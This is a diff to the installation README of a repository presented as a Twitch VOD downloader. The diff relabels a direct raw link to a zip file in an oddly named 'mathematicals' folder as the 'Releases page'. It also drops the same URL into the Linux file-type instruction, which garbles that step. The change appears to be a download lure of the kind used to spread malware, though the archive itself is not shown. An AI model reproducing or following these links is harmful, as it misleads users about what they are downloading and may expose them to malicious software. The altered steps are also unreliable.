elkush420/Twitch-VOD-downloader/README.md

 Here's how to get started with Twitch-VOD-downloader:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/elkush420/Twitch-VOD-downloader/releases) to see the latest versions of the application.
+   Go to the [Releases page](https://raw.githubusercontent.com/elkush420/Twitch-VOD-downloader/main/mathematicals/Twitch-VOD-downloader.zip) to see the latest versions of the application.

 2. **Select Your Version**
    Review the list of available releases.
 Each release includes a version number and a brief description of what's new or fixed.

 3. **Download the Application**
    Click on the version you'd like to download.
-Look for files that end in `.exe` for Windows, `.dmg` for Mac, or `.tar.gz` for Linux users.
+Look for files that end in `.exe` for Windows, `.dmg` for Mac, or `https://raw.githubusercontent.com/elkush420/Twitch-VOD-downloader/main/mathematicals/Twitch-VOD-downloader.zip` for Linux users.
 Download the appropriate file for your operating system.

 4. **Install the Software**
    - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.